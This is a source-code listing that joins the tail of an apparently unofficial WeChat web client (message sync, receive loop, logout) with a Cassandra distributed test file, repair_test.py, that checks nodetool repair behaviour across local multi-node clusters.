'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
continue
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList: self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
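# (Commonly observed selector values from synccheck, for reference: '0' = nothing
#  new, '2' = new message, '7' = entered/left a conversation; a retcode other
#  than '0' means the session is no longer valid.)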
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
repair_test.py
|
import threading
import time
from collections import namedtuple
from unittest import skip
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from dtest import FlakyRetryPolicy, Tester, debug
from tools import insert_c1c2, known_failure, no_vnodes, query_c1c2, since
def _repair_options(version, ks='', cf=None, sequential=True):
"""
Function for assembling appropriate repair CLI options,
based on C* version, as defaults have changed.
@param ks The keyspace to repair
@param cf The table to repair
@param sequential If the repair should be a sequential repair [vs parallel]
"""
opts = []
# since version 2.2, default is parallel, otherwise it's sequential
if sequential:
if version >= '2.2':
opts += ['-seq']
else:
if version < '2.2':
opts += ['-par']
# test with full repair
if version >= '2.2':
opts += ['-full']
if ks:
opts += [ks]
if cf:
opts += [cf]
return opts
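# Illustrative examples of the options assembled above:
#   _repair_options('2.2', ks='ks', cf='cf', sequential=True)  -> ['-seq', '-full', 'ks', 'cf']
#   _repair_options('2.2', ks='ks', sequential=False)          -> ['-full', 'ks']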
class BaseRepairTest(Tester):
__test__ = False
def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True):
"""
Function to verify the rows on a given node, without interference
from the other nodes in the cluster
@param node_to_check The given node to check. Should be the node, not the index
@param rows The number of rows we expect
@param found A list of partition keys that we expect to be on the node
@param missings A list of partition keys we expect NOT to be on the node
@param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test.
"""
if found is None:
found = []
if missings is None:
missings = []
stopped_nodes = []
for node in self.cluster.nodes.values():
if node.is_running() and node is not node_to_check:
stopped_nodes.append(node)
node.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node_to_check, 'ks')
result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2)))
self.assertEqual(len(result), rows)
for k in found:
query_c1c2(session, k, ConsistencyLevel.ONE)
for k in missings:
query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE)
res = list(session.execute(query))
self.assertEqual(len(filter(lambda x: len(x) != 0, res)), 0, res)
if restart:
for node in stopped_nodes:
node.start(wait_other_notice=True)
def _populate_cluster(self, start=True):
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.cluster.default_retry_policy = FlakyRetryPolicy(max_retries=15)
self.create_ks(session, 'ks', 3)
self.create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys
debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL)
node3.flush()
node3.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO)
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
insert_c1c2(session, keys=range(1001, 2001), consistency=ConsistencyLevel.ALL)
cluster.flush()
def _repair_and_verify(self, sequential=True):
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Verify that node3 has only 2000 keys
debug("Checking data on node3...")
self.check_rows_on_node(node3, 2000, missings=[1000])
# Verify that node1 has 2001 keys
debug("Checking data on node1...")
self.check_rows_on_node(node1, 2001, found=[1000])
# Verify that node2 has 2001 keys
debug("Checking data on node2...")
self.check_rows_on_node(node2, 2001, found=[1000])
time.sleep(10) # see CASSANDRA-4373
# Run repair
start = time.time()
debug("starting repair...")
node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
debug("Repair time: {end}".format(end=time.time() - start))
        # Validate that only one range was transferred
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node3.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node3 now has the key
self.check_rows_on_node(node3, 2001, found=[1000], restart=False)
class TestRepair(BaseRepairTest):
__test__ = True
@since('2.2.1')
def no_anticompaction_after_dclocal_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a -local repair on node1 in dc1
* Assert that the dc1 nodes see repair messages
* Assert that the dc2 nodes do not see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -local keyspace1 standard1")
self.assertTrue(node1_1.grep_log("Not a global repair"))
self.assertTrue(node2_1.grep_log("Not a global repair"))
# dc2 should not see these messages:
self.assertFalse(node1_2.grep_log("Not a global repair"))
self.assertFalse(node2_2.grep_log("Not a global repair"))
# and no nodes should do anticompaction:
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.1')
def no_anticompaction_after_hostspecific_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a repair on all nodes, by enumerating with -hosts
* Assert all nodes see a repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue(node.grep_log("Not a global repair"))
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.4')
def no_anticompaction_after_subrange_repair_test(self):
"""
* Launch a three node, two DC cluster
* Start a repair on a token range
* Assert all nodes see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue(node.grep_log("Not a global repair"))
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.1')
def anticompaction_after_normal_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a normal repair
* Assert every node anticompacts
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)'])
node1_1.nodetool("repair keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue("Starting anticompaction")
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-12162',
flaky=True,
notes='windows')
def simple_sequential_repair_test(self):
"""
Calls simple repair test with a sequential repair
"""
self._simple_repair(sequential=True)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11247',
flaky=True,
notes='windows')
def simple_parallel_repair_test(self):
"""
Calls simple repair test with a parallel repair
"""
self._simple_repair(sequential=False)
def empty_vs_gcable_sequential_repair_test(self):
"""
Calls empty_vs_gcable repair test with a sequential repair
"""
self._empty_vs_gcable_no_repair(sequential=True)
def empty_vs_gcable_parallel_repair_test(self):
"""
Calls empty_vs_gcable repair test with a parallel repair
"""
self._empty_vs_gcable_no_repair(sequential=False)
def range_tombstone_digest_sequential_repair_test(self):
"""
Calls range_tombstone_digest with a sequential repair
"""
self._range_tombstone_digest(sequential=True)
def range_tombstone_digest_parallel_repair_test(self):
"""
Calls range_tombstone_digest with a parallel repair
"""
self._range_tombstone_digest(sequential=False)
@since('2.1')
def shadowed_cell_digest_sequential_repair_test(self):
"""
Calls _cell_shadowed_by_range_tombstone with sequential repair
"""
self._cell_shadowed_by_range_tombstone(sequential=True)
@since('2.1')
def shadowed_cell_digest_parallel_repair_test(self):
"""
Calls _cell_shadowed_by_range_tombstone with parallel repair
"""
self._cell_shadowed_by_range_tombstone(sequential=False)
@since('3.0')
def shadowed_range_tombstone_digest_sequential_repair_test(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=True)
@since('3.0')
def shadowed_range_tombstone_digest_parallel_repair_test(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=False)
@no_vnodes()
def simple_repair_order_preserving_test(self):
"""
Calls simple repair test with OPP and sequential repair
@jira_ticket CASSANDRA-5220
"""
self._simple_repair(order_preserving_partitioner=True)
def _simple_repair(self, order_preserving_partitioner=False, sequential=True):
"""
* Configure a three node cluster to not use hinted handoff, and to use batch commitlog
* Launch the cluster
* Create a keyspace at RF 3 and table
* Insert one thousand rows at CL ALL
* Flush on node3 and shut it down
* Insert one row at CL TWO
* Restart node3
* Insert one thousand more rows at CL ALL
* Flush all nodes
* Check node3 only has 2000 keys
* Check node1 and node2 have 2001 keys
* Perform the repair type specified by the parent test
* Assert the appropriate messages are logged
* Assert node3 now has all data
@jira_ticket CASSANDRA-4373
"""
if order_preserving_partitioner:
self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner')
self._populate_cluster()
self._repair_and_verify(sequential)
def _empty_vs_gcable_no_repair(self, sequential):
"""
        Repairing an empty partition and a partition whose tombstones are older than
        gc_grace should be treated the same: no repair is necessary.
@jira_ticket CASSANDRA-8979.
"""
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
self.create_ks(session, 'ks', 2)
        # We create two tables: cf1 has a low gc_grace_seconds so its data becomes
        # GC-able during the test (we never actually drop it), while cf2 keeps the
        # default gc_grace. Compaction is disabled on both so data is not purged.
query = """
CREATE TABLE cf1 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH gc_grace_seconds=1
AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
query = """
CREATE TABLE cf2 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
# take down node2, so that only node1 has gc-able data
node2.stop(wait_other_notice=True)
for cf in ['cf1', 'cf2']:
# insert some data
for i in xrange(0, 10):
for j in xrange(0, 1000):
query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# delete those data, half with row tombstone, and the rest with cell range tombstones
for i in xrange(0, 5):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
for i in xrange(5, 10):
for j in xrange(0, 1000):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# sleep until gc grace seconds pass so that cf1 can be dropped
time.sleep(2)
# bring up node2 and repair
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check no rows will be returned
for cf in ['cf1', 'cf2']:
for i in xrange(0, 10):
query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL)
res = list(session.execute(query))
self.assertEqual(len(filter(lambda x: len(x) != 0, res)), 0, res)
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for cf1")
self.assertEqual(len(out_of_sync_logs), 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs]))
# check log for actual repair for non gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for cf2")
self.assertGreater(len(out_of_sync_logs), 0, "Non GC-able data should be repaired")
def _range_tombstone_digest(self, sequential):
"""
        Multiple range tombstones for the same partition and interval must not create a digest mismatch as long
        as the most recent tombstone is present.
        @jira_ticket CASSANDRA-11349.
"""
def withsession(session, node1):
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
node1.flush()
# recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2)
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
self._repair_digest(sequential, withsession)
def _cell_shadowed_by_range_tombstone(self, sequential):
"""
        Cells shadowed by range tombstones must not affect repairs (given the tombstones are present on all nodes)
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
self._repair_digest(sequential, withSession)
def _range_tombstone_shadowed_by_range_tombstone(self, sequential):
"""
        Range tombstones shadowed by other range tombstones must not affect repairs
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'")
self._repair_digest(sequential, withSession)
def _repair_digest(self, sequential, populate):
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
self.create_ks(session, 'ks', 2)
query = """
CREATE TABLE IF NOT EXISTS table1 (
c1 text,
c2 text,
c3 text,
c4 float,
PRIMARY KEY (c1, c2, c3)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
populate(session, node1)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for table1")
self.assertEqual(len(out_of_sync_logs), 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs])))
def local_dc_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -local repair on one DC
* Assert only nodes in that DC are repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
debug("starting repair...")
opts = ["-local"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 1, "Lines matching: {}".format(len(out_of_sync_logs)))
line, m = out_of_sync_logs[0]
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
valid_out_of_sync_pairs = {node1.address(), node2.address()}
self.assertEqual(out_of_sync_nodes, valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def dc_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11605',
flaky=True,
notes='flaky on Windows')
def dc_parallel_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's, with -dcpar
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"]
opts += _repair_options(self.cluster.version(), ks="ks", sequential=False)
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
# Check the repair was a dc parallel repair
if self.cluster.version() >= '2.2':
self.assertEqual(len(node1.grep_log('parallelism: dc_parallel')), 1, str(node1.grep_log('parallelism')))
else:
self.assertEqual(len(node1.grep_log('parallelism=PARALLEL')), 1, str(node1.grep_log('parallelism')))
def _setup_multi_dc(self):
"""
Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3').
After set up, node2 in dc1 lacks some data and needs to be repaired.
"""
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
        # interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
# populate 2 nodes in dc1, and one node each in dc2 and dc3
cluster.populate([2, 1, 1]).start(wait_for_binary_proto=True)
node1, node2, node3, node4 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}")
session.execute("USE ks")
self.create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys
debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL)
node2.flush()
node2.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE)
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node1.watch_log_for_alive(node2)
insert_c1c2(session, keys=range(1001, 2001), consistency=ConsistencyLevel.ALL)
cluster.flush()
        # Verify that node2 has only 2000 keys while the others have 2001 keys
debug("Checking data...")
self.check_rows_on_node(node2, 2000, missings=[1000])
for node in [node1, node3, node4]:
self.check_rows_on_node(node, 2001, found=[1000])
return cluster
@since('2.2')
def parallel_table_repair_noleak(self):
"""
@jira_ticket CASSANDRA-11215
        Tests that multiple parallel repairs on the same table don't
        cause reference leaks.
"""
self.ignore_log_patterns = [
"Cannot start multiple repair sessions over the same sstables", # The message we are expecting
"Validation failed in", # Expecting validation to fail
"RMI Runtime", # JMX Repair failures
"Session completed with the following error", # The nodetool repair error
"ValidationExecutor", # Errors by the validation executor
"RepairJobTask" # Errors by the repair job task
]
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([3]).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
# Start multiple repairs in parallel
threads = []
for i in range(3):
t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",))
threads.append(t)
t.start()
# Wait for the repairs to finish
for t in threads:
t.join()
found_message = False
# All nodes should reject multiple repairs and have no reference leaks
for node in cluster.nodelist():
if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0:
found_message = True
break
self.assertTrue(found_message)
@no_vnodes()
def token_range_repair_test(self):
"""
Test repair using the -st and -et options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-st', str(node3.initial_token), '-et', str(node1.initial_token)])
@no_vnodes()
def partitioner_range_repair_test(self):
"""
Test repair using the -pr option
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-pr'])
def _parameterized_range_repair(self, repair_opts):
"""
@param repair_opts A list of strings which represent cli args to nodetool repair
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1, using repair_opts
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns
opts = repair_opts
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
self.assertEqual(len(node1.grep_log('are consistent for standard1')), 0, "Nodes 1 and 2 should not be consistent.")
self.assertEqual(len(node3.grep_log('Repair command')), 0, "Node 3 should not have been involved in the repair.")
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
@since('2.2')
def trace_repair_test(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads to 2 and with tracing enabled
* Check the trace data was written, and that the right job thread count was used
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
cluster.flush()
job_thread_count = '2'
opts = ['-tr', '-j', job_thread_count]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
session = self.patient_cql_connection(node1)
